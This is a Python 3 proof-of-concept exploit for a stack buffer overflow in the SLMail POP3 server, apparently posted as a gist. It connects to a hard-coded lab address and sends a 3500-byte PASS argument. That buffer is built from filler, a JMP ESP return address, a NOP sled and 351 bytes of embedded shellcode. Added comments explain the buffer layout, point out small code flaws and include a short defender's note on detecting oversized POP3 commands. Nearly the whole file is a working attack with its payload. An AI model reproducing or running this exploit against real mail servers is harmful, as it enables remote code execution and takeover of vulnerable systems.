SLMail overflow in python3
#!/usr/bin/python3
import socket
#Python 2 is dead/on borrowed time, write exploits in Python3 FTW
# Proof-of-concept for the SLMail POP3 stack overflow named in the gist title.
# The script does one thing: open a POP3 session and send a single oversized
# PASS argument (3500 bytes) whose layout is described at `buffer` below.
# Nothing here is parameterised — target, offset, return address and payload
# are all hard-coded, so it is a demonstration, not a reusable tool.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Replace shellcode with your own but prepend b" to hex strings
# 23 lines x 15 bytes + 6 bytes = 351 bytes. The literal `351` in the
# padding arithmetic further down must stay equal to len(shellcode), or the
# total buffer length silently drifts away from 3500.
shellcode: bytes = (
b"\xda\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xbd\xc6\xe9\x1f\xf7\xb1"
b"\x52\x31\x6f\x17\x03\x6f\x17\x83\x29\x15\xfd\x02\x49\x0e\x80"
b"\xed\xb1\xcf\xe5\x64\x54\xfe\x25\x12\x1d\x51\x96\x50\x73\x5e"
b"\x5d\x34\x67\xd5\x13\x91\x88\x5e\x99\xc7\xa7\x5f\xb2\x34\xa6"
b"\xe3\xc9\x68\x08\xdd\x01\x7d\x49\x1a\x7f\x8c\x1b\xf3\x0b\x23"
b"\x8b\x70\x41\xf8\x20\xca\x47\x78\xd5\x9b\x66\xa9\x48\x97\x30"
b"\x69\x6b\x74\x49\x20\x73\x99\x74\xfa\x08\x69\x02\xfd\xd8\xa3"
b"\xeb\x52\x25\x0c\x1e\xaa\x62\xab\xc1\xd9\x9a\xcf\x7c\xda\x59"
b"\xad\x5a\x6f\x79\x15\x28\xd7\xa5\xa7\xfd\x8e\x2e\xab\x4a\xc4"
b"\x68\xa8\x4d\x09\x03\xd4\xc6\xac\xc3\x5c\x9c\x8a\xc7\x05\x46"
b"\xb2\x5e\xe0\x29\xcb\x80\x4b\x95\x69\xcb\x66\xc2\x03\x96\xee"
b"\x27\x2e\x28\xef\x2f\x39\x5b\xdd\xf0\x91\xf3\x6d\x78\x3c\x04"
b"\x91\x53\xf8\x9a\x6c\x5c\xf9\xb3\xaa\x08\xa9\xab\x1b\x31\x22"
b"\x2b\xa3\xe4\xe5\x7b\x0b\x57\x46\x2b\xeb\x07\x2e\x21\xe4\x78"
b"\x4e\x4a\x2e\x11\xe5\xb1\xb9\x14\xf1\xb9\x7a\x41\x07\xb9\x7d"
b"\x2a\x8e\x5f\x17\x5c\xc7\xc8\x80\xc5\x42\x82\x31\x09\x59\xef"
b"\x72\x81\x6e\x10\x3c\x62\x1a\x02\xa9\x82\x51\x78\x7c\x9c\x4f"
b"\x14\xe2\x0f\x14\xe4\x6d\x2c\x83\xb3\x3a\x82\xda\x51\xd7\xbd"
b"\x74\x47\x2a\x5b\xbe\xc3\xf1\x98\x41\xca\x74\xa4\x65\xdc\x40"
b"\x25\x22\x88\x1c\x70\xfc\x66\xdb\x2a\x4e\xd0\xb5\x81\x18\xb4"
b"\x40\xea\x9a\xc2\x4c\x27\x6d\x2a\xfc\x9e\x28\x55\x31\x77\xbd"
b"\x2e\x2f\xe7\x42\xe5\xeb\x17\x09\xa7\x5a\xb0\xd4\x32\xdf\xdd"
b"\xe6\xe9\x1c\xd8\x64\x1b\xdd\x1f\x74\x6e\xd8\x64\x32\x83\x90"
b"\xf5\xd7\xa3\x07\xf5\xfd" )
# 5F4A358F FFE4 JMP ESP
# Little-endian byte order of the 0x5F4A358F address from the comment above.
# It sits right after the 2606-byte filler, i.e. the script assumes (does not
# verify) that offset 2606 is where the saved return address lives.
jmpespaddr: bytes = b'\x8f\x35\x4a\x5f'
# The outer bytes(...) is redundant: str.encode() already returns bytes.
prepad: bytes = bytes(("A" * 2606).encode())
nopsled: bytes = b'\x90' * 16 #accidentally sent \x60, because typo, and it still worked, weirdly enough.
# 3500 - 2606 - 4 - 16 - 351 = 523 trailing filler bytes, so the PASS argument
# is always exactly 3500 bytes long regardless of payload contents.
padding: bytes = bytes(("C" * (3500 - 2606 - 4 - 16 - 351)).encode())
# Wire layout: 2606 x 'A' | 4-byte address | 16 x NOP | 351-byte payload | 523 x 'C'.
# Defender's note: a PASS argument of ~3.5 KB is orders of magnitude longer
# than any credential, so a length limit or length-anomaly rule on POP3
# command lines detects this whole family of attacks at the network edge.
buffer: bytes = prepad + jmpespaddr + nopsled + shellcode + padding
try:
    print("\nSending not very nice buffer...")
    # socket.connect() returns None, so `connect` is never anything else and is
    # unused; the assignment only adds noise.
    connect=s.connect(('10.10.10.10',110)) #Replace IP with pop3 server IP
    # Banner and USER response are read only to keep the protocol in step;
    # their contents are discarded, and recv() may return less than a full
    # response if the server is slow.
    s.recv(1024)
    s.send(b'USER operator\r\n')
    s.recv(1024)
    s.send(b'PASS ' + buffer + b'\r\n')
    print("\nDone!")
    # Only reached on the success path: on any exception the socket is left
    # open until the interpreter exits.
    s.close()
except Exception as e:
    # Catches everything (connect, recv and send failures alike), so a failure
    # after the connection was established is still reported as a connection
    # error; `e` is printed so the real cause is at least visible.
    print("Could not connect to POP3")
    print(e)